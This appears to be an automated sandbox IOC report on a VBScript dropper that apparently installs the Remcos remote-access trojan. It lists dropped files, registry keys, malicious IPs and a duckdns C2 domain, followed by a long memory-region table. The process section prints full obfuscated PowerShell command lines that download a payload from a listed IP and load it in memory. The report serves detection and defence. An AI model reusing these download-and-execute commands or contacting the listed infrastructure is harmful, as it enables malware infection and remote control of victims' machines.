IOC Report
sostener.vbs

loading gif

Files

File Path
Type
Category
Malicious
sostener.vbs
Unicode text, UTF-16, little-endian text, with very long lines (325), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\registros.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qhn3up5.213.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czrpacwp.ndu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enrupsoj.ymi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxryu1dp.nvd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0k430p.vcw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dll01.txt
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
unknown
malicious
http://91.202.233.169
unknown
malicious
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
unknown
malicious
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
91.202.233.169
malicious
remcosnov24.duckdns.org
malicious
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
91.202.233.169
malicious
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
unknown
malicious
http://91.202.
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://bbuseruploads.s3.amazonaws.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://geoplugin.net/json.gpk
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://bbuseruploads.s3.amazohj6
unknown
http://bitbucket.org
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
unknown
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
unknown
https://bitbucket.org/hector4576--/noviembre19/downloads/sos
unknown
http://geoplugin.net/json.gp/C
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
http://crl.veris
unknown
http://91.202.H
unknown
https://cdn.cookielaw.org/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://aui-cdn.atlassian.com/
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
https://aka.ms/pscore68
unknown
https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
185.166.143.49
http://s3-w.us-east-1.amazonaws.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
http://bbuseruploads.s3.amazonaws.com
unknown
https://oneget.org
unknown
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
remcosnov24.duckdns.org
190.9.223.135
malicious
s3-w.us-east-1.amazonaws.com
52.217.196.57
bitbucket.org
185.166.143.49
geoplugin.net
178.237.33.50
bbuseruploads.s3.amazonaws.com
unknown

IPs

IP
Domain
Country
Malicious
91.202.233.169
unknown
Russian Federation
malicious
190.9.223.135
remcosnov24.duckdns.org
Colombia
malicious
127.0.0.1
unknown
unknown
malicious
185.166.143.49
bitbucket.org
Germany
178.237.33.50
geoplugin.net
Netherlands
52.217.196.57
s3-w.us-east-1.amazonaws.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1158000
heap
page read and write
malicious
25F20450000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
25F206D9000
trusted library allocation
page read and write
malicious
CD072FE000
stack
page read and write
22613E50000
heap
page read and write
26C310EE000
trusted library allocation
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
25F28C70000
trusted library section
page read and write
25F2893F000
heap
page read and write
2262DFA0000
heap
page read and write
1140000
heap
page read and write
25F11F91000
trusted library allocation
page read and write
17AE384E000
heap
page read and write
22615A51000
trusted library allocation
page read and write
25F28ECE000
heap
page read and write
17AE5DAB000
heap
page read and write
A4C7EFE000
stack
page read and write
267738CA000
heap
page read and write
25F101C0000
trusted library allocation
page read and write
25F103D0000
heap
page read and write
26C32531000
trusted library allocation
page read and write
7FFAAC370000
trusted library allocation
page read and write
2262DEA0000
heap
page read and write
7FFAAC520000
trusted library allocation
page execute and read and write
25F108FE000
trusted library allocation
page read and write
26C2F1A0000
heap
page read and write
26C3295B000
trusted library allocation
page read and write
8A50A3E000
stack
page read and write
7FFB1E0E0000
unkown
page readonly
7FFAAC5D0000
trusted library allocation
page read and write
7FFAAC512000
trusted library allocation
page read and write
7FFAAC552000
trusted library allocation
page read and write
A4C85BE000
stack
page read and write
A4C863B000
stack
page read and write
903FBFE000
stack
page read and write
26C41080000
trusted library allocation
page read and write
22613FCB000
heap
page read and write
7FFB1E3B6000
unkown
page readonly
7FFAAC670000
trusted library allocation
page read and write
1B92B630000
heap
page read and write
25F109FD000
trusted library allocation
page read and write
17AE56FA000
heap
page read and write
CD075FE000
stack
page read and write
8A5077D000
stack
page read and write
7FFAAC333000
trusted library allocation
page execute and read and write
7FFAAC362000
trusted library allocation
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
17AE385D000
heap
page read and write
7FFAAC510000
trusted library allocation
page read and write
7FFAAC650000
trusted library allocation
page read and write
25F11A07000
trusted library allocation
page read and write
7FFAAC36D000
trusted library allocation
page execute and read and write
25F28924000
heap
page read and write
25F0E727000
heap
page read and write
8A5067F000
stack
page read and write
25F28810000
heap
page read and write
25F0E9E0000
heap
page read and write
7FFAAC660000
trusted library allocation
page read and write
25F1095E000
trusted library allocation
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
22613FD0000
heap
page read and write
25F11A02000
trusted library allocation
page read and write
7FFAAC670000
trusted library allocation
page read and write
25F10A4E000
trusted library allocation
page read and write
25F11DFA000
trusted library allocation
page read and write
226160BB000
trusted library allocation
page read and write
8A50938000
stack
page read and write
7FFAAC610000
trusted library allocation
page read and write
4FC25FE000
stack
page read and write
3A7E000
stack
page read and write
8A516CE000
stack
page read and write
7FFAAC4EA000
trusted library allocation
page read and write
7FFAAC6E7000
trusted library allocation
page read and write
25F203F0000
trusted library allocation
page read and write
22615AB8000
trusted library allocation
page read and write
22615B6F000
trusted library allocation
page read and write
26C2F1E8000
heap
page read and write
4FC218A000
stack
page read and write
25F10A8A000
trusted library allocation
page read and write
25F10997000
trusted library allocation
page read and write
26C49070000
heap
page read and write
26C490D9000
heap
page read and write
25F28910000
heap
page read and write
26C490B2000
heap
page read and write
26C30EF3000
heap
page read and write
17AE38AD000
heap
page read and write
2262DEE0000
heap
page read and write
CD07477000
stack
page read and write
267738C0000
heap
page read and write
26C2F1E0000
heap
page read and write
473000
remote allocation
page execute and read and write
17AE3856000
heap
page read and write
26C2F1E2000
heap
page read and write
22615E06000
trusted library allocation
page read and write
22615E42000
trusted library allocation
page read and write
17AE3A6D000
heap
page read and write
26C31060000
heap
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
17AE386D000
heap
page read and write
CD073F9000
stack
page read and write
26C4910E000
heap
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
226140E0000
heap
page read and write
476000
remote allocation
page execute and read and write
2E7F000
stack
page read and write
7FFAAC332000
trusted library allocation
page read and write
25F28993000
heap
page read and write
22613EF0000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page read and write
25F10A7F000
trusted library allocation
page read and write
26C30A60000
trusted library allocation
page read and write
22613F10000
trusted library allocation
page read and write
7FFAAC410000
trusted library allocation
page read and write
30BF000
stack
page read and write
25F10906000
trusted library allocation
page read and write
1B92B420000
heap
page read and write
129D000
stack
page read and write
26C49140000
heap
page read and write
26773AC0000
heap
page read and write
25F1045D000
trusted library allocation
page read and write
8A5047E000
stack
page read and write
25F102A6000
heap
page read and write
7FFAAC511000
trusted library allocation
page read and write
26C32517000
trusted library allocation
page read and write
8A517CD000
stack
page read and write
7FFAAC570000
trusted library allocation
page read and write
4FC2AFD000
stack
page read and write
7FFB1E102000
unkown
page readonly
25F287F0000
trusted library section
page read and write
CD070FE000
stack
page read and write
8A504FF000
stack
page read and write
17AE3900000
heap
page read and write
2262DEA2000
heap
page read and write
25F2078C000
trusted library allocation
page read and write
17AE660F000
heap
page read and write
7FFAAC5A0000
trusted library allocation
page read and write
17AE5A4F000
heap
page read and write
22625A5F000
trusted library allocation
page read and write
26C31071000
trusted library allocation
page read and write
25F0E8D0000
heap
page read and write
8A50ABE000
stack
page read and write
26C410EE000
trusted library allocation
page read and write
8A5160E000
stack
page read and write
22615A6D000
trusted library allocation
page read and write
7FFAAC680000
trusted library allocation
page read and write
7FFAAC580000
trusted library allocation
page read and write
26C30BA4000
heap
page read and write
22613E70000
heap
page read and write
903FA7F000
unkown
page read and write
7FFAAC680000
trusted library allocation
page read and write
25F2891C000
heap
page read and write
7FFAAC3F0000
trusted library allocation
page execute and read and write
7FFB1E100000
unkown
page read and write
26C49151000
heap
page read and write
25F10A8E000
trusted library allocation
page read and write
17AE386D000
heap
page read and write
A4C82BE000
stack
page read and write
26C2F434000
heap
page read and write
25F28D00000
heap
page read and write
7FFAAC5D0000
trusted library allocation
page read and write
8A508B7000
stack
page read and write
2262DFC0000
heap
page read and write
30FD000
stack
page read and write
17AE385C000
heap
page read and write
7FFAAC500000
trusted library allocation
page execute and read and write
226160B4000
trusted library allocation
page read and write
2261402B000
heap
page read and write
25F10A6E000
trusted library allocation
page read and write
17AE3846000
heap
page read and write
25F0E6E0000
heap
page read and write
4FC2BFE000
stack
page read and write
22613F30000
trusted library allocation
page read and write
17AE389B000
heap
page read and write
17AE53A0000
heap
page read and write
25F1098E000
trusted library allocation
page read and write
25F108F4000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
17AE386D000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
226159C7000
heap
page execute and read and write
7FFAAC38D000
trusted library allocation
page execute and read and write
CD0767E000
stack
page read and write
8A5083E000
stack
page read and write
A4C7FFC000
stack
page read and write
7FFB1E0E1000
unkown
page execute read
7FFB1E0F6000
unkown
page readonly
7FFAAC380000
trusted library allocation
page read and write
7FFAAC4F0000
trusted library allocation
page execute and read and write
17AE56F0000
heap
page read and write
7FFAAC37B000
trusted library allocation
page read and write
3D6E000
stack
page read and write
25F0E72B000
heap
page read and write
25F10AC0000
trusted library allocation
page read and write
25F28807000
heap
page execute and read and write
25F28F10000
heap
page read and write
22613F88000
heap
page read and write
7FFAAC540000
trusted library allocation
page read and write
1B92B440000
heap
page read and write
7FFAAC420000
trusted library allocation
page execute and read and write
7FFAAC360000
trusted library allocation
page read and write
12A6000
heap
page read and write
903FAFF000
stack
page read and write
CD0727F000
stack
page read and write
7FFAAC5A0000
trusted library allocation
page read and write
7FFAAC6D2000
trusted library allocation
page read and write
1B92B45E000
heap
page read and write
A4C80FE000
stack
page read and write
A4C823E000
stack
page read and write
26C49330000
heap
page read and write
22615A9B000
trusted library allocation
page read and write
22615A74000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page read and write
26C32A4A000
trusted library allocation
page read and write
17AE37F0000
heap
page read and write
A4C807E000
stack
page read and write
226160C2000
trusted library allocation
page read and write
325E000
stack
page read and write
7FFB1E3A0000
unkown
page readonly
26C2F200000
heap
page read and write
22615FAD000
trusted library allocation
page read and write
22613EB0000
heap
page read and write
26C3252F000
trusted library allocation
page read and write
26C30AD3000
trusted library allocation
page read and write
4FC2DFC000
stack
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
7FFAAC3E0000
trusted library allocation
page read and write
7FFAAC416000
trusted library allocation
page read and write
7FFAAC521000
trusted library allocation
page read and write
7FFAAC374000
trusted library allocation
page read and write
22613F20000
heap
page readonly
7FFAAC590000
trusted library allocation
page read and write
7FFAAC3EC000
trusted library allocation
page execute and read and write
7FFAAC690000
trusted library allocation
page read and write
CD06DEE000
stack
page read and write
8A506FE000
stack
page read and write
2262DF44000
heap
page read and write
25F0E910000
heap
page read and write
17AE3853000
heap
page read and write
22614130000
heap
page read and write
26C490B4000
heap
page read and write
17AE3849000
heap
page read and write
17AE381F000
heap
page read and write
4FC24FE000
stack
page read and write
26C49580000
heap
page read and write
25F1153A000
trusted library allocation
page read and write
26C2F22C000
heap
page read and write
22613F81000
heap
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
22615A44000
heap
page read and write
25F10902000
trusted library allocation
page read and write
CD0707E000
stack
page read and write
A4C84BE000
stack
page read and write
25F28F39000
heap
page read and write
4FC28FF000
stack
page read and write
17AE386D000
heap
page read and write
26C32CA6000
trusted library allocation
page read and write
D96FBCD000
stack
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
25F0E990000
trusted library allocation
page read and write
903F7EC000
stack
page read and write
31FF000
stack
page read and write
903FB7E000
stack
page read and write
7FFAAC42C000
trusted library allocation
page execute and read and write
3D2F000
stack
page read and write
2262DF73000
heap
page read and write
7FFAAC560000
trusted library allocation
page execute and read and write
8A505FD000
stack
page read and write
26C2F030000
heap
page read and write
26C491E0000
heap
page read and write
2262E400000
heap
page read and write
D96FEFF000
unkown
page read and write
25F10B23000
trusted library allocation
page read and write
17AE3842000
heap
page read and write
26C30BA0000
heap
page read and write
26C2F430000
heap
page read and write
A4C7E7E000
stack
page read and write
1196000
heap
page read and write
7FFAAC610000
trusted library allocation
page read and write
7FFAAC590000
trusted library allocation
page read and write
22625A51000
trusted library allocation
page read and write
8A501C3000
stack
page read and write
7FFAAC51A000
trusted library allocation
page read and write
25F10603000
trusted library allocation
page read and write
25F10B3A000
trusted library allocation
page read and write
226159C0000
heap
page execute and read and write
25F0E71F000
heap
page read and write
2262DF6B000
heap
page read and write
7FFAAC542000
trusted library allocation
page read and write
26C30B36000
heap
page execute and read and write
226159D0000
heap
page execute and read and write
7FFAAC6C0000
trusted library allocation
page read and write
2F7F000
stack
page read and write
26C30AD0000
trusted library allocation
page read and write
22615E15000
trusted library allocation
page read and write
1B92B449000
heap
page read and write
25F0E76B000
heap
page read and write
3C2E000
stack
page read and write
7FFAAC380000
trusted library allocation
page read and write
7FFAAC620000
trusted library allocation
page read and write
22615B5B000
trusted library allocation
page read and write
7FFAAC4D2000
trusted library allocation
page read and write
7FFAAC530000
trusted library allocation
page execute and read and write
25F11E38000
trusted library allocation
page read and write
8A509B9000
stack
page read and write
17AE6107000
heap
page read and write
25F0E768000
heap
page read and write
25F12057000
trusted library allocation
page read and write
17AE56F2000
heap
page read and write
7FFB1E100000
unkown
page read and write
7FFAAC3E6000
trusted library allocation
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
7FFAAC600000
trusted library allocation
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
22615BAE000
trusted library allocation
page read and write
17AE3A65000
heap
page read and write
8A50C3C000
stack
page read and write
26C410E2000
trusted library allocation
page read and write
25F28F16000
heap
page read and write
7FFAAC372000
trusted library allocation
page read and write
8A507F9000
stack
page read and write
7FFAAC416000
trusted library allocation
page execute and read and write
26C32CA2000
trusted library allocation
page read and write
25F28E66000
heap
page read and write
17AE39E0000
heap
page read and write
25F10B02000
trusted library allocation
page read and write
26C32BDD000
trusted library allocation
page read and write
7FFAAC480000
trusted library allocation
page execute and read and write
7FFAAC500000
trusted library allocation
page read and write
8A5174E000
stack
page read and write
26773710000
heap
page read and write
25F0E7D5000
heap
page read and write
25F10961000
trusted library allocation
page read and write
17AE5DAC000
heap
page read and write
7FFAAC490000
trusted library allocation
page execute and read and write
25F0E980000
heap
page readonly
22613D70000
heap
page read and write
3ABE000
stack
page read and write
1150000
heap
page read and write
CD07578000
stack
page read and write
26C30A80000
trusted library allocation
page read and write
22615E5E000
trusted library allocation
page read and write
26C49118000
heap
page read and write
25F206CA000
trusted library allocation
page read and write
26C49145000
heap
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
7FFAAC41C000
trusted library allocation
page execute and read and write
7FFAAC33D000
trusted library allocation
page execute and read and write
26C324DD000
trusted library allocation
page read and write
7FFAAC334000
trusted library allocation
page read and write
CD0717E000
stack
page read and write
7FFAAC37D000
trusted library allocation
page execute and read and write
26C30B10000
trusted library allocation
page read and write
25F0E950000
trusted library allocation
page read and write
17AE56F4000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
A4C7BDE000
stack
page read and write
2262DF66000
heap
page read and write
7FFAAC570000
trusted library allocation
page read and write
25F1095A000
trusted library allocation
page read and write
22613FC9000
heap
page read and write
25F28CF0000
heap
page read and write
397D000
stack
page read and write
D4C000
stack
page read and write
2262DF51000
heap
page read and write
25F28EB4000
heap
page read and write
7FFAAC560000
trusted library allocation
page read and write
25F0E9E4000
heap
page read and write
2FBC000
stack
page read and write
A4C843E000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
7FFAAC52A000
trusted library allocation
page read and write
1B92B6A0000
heap
page read and write
7FFAAC340000
trusted library allocation
page read and write
7FFAAC580000
trusted library allocation
page read and write
7FFAAC630000
trusted library allocation
page read and write
25F0E73F000
heap
page read and write
CD0777E000
stack
page read and write
383E000
stack
page read and write
4FC2CFF000
stack
page read and write
7FFAAC530000
trusted library allocation
page read and write
7FFAAC450000
trusted library allocation
page execute and read and write
25F28E80000
heap
page read and write
17AE383D000
heap
page read and write
17AE3A60000
heap
page read and write
7FFAAC540000
trusted library allocation
page execute and read and write
7FFAAC5A0000
trusted library allocation
page read and write
25F10A72000
trusted library allocation
page read and write
26C4135B000
trusted library allocation
page read and write
26C30B30000
heap
page execute and read and write
22615B6B000
trusted library allocation
page read and write
12A0000
heap
page read and write
17AE56FA000
heap
page read and write
7FFAAC600000
trusted library allocation
page read and write
22615AE4000
trusted library allocation
page read and write
1B92B6A4000
heap
page read and write
17AE3820000
heap
page read and write
CD071FD000
stack
page read and write
25F0E970000
trusted library allocation
page read and write
2D5C000
stack
page read and write
25F103E1000
trusted library allocation
page read and write
7FFAAC550000
trusted library allocation
page read and write
7FFB1E3A1000
unkown
page execute read
26C3291E000
trusted library allocation
page read and write
17AE3A00000
heap
page read and write
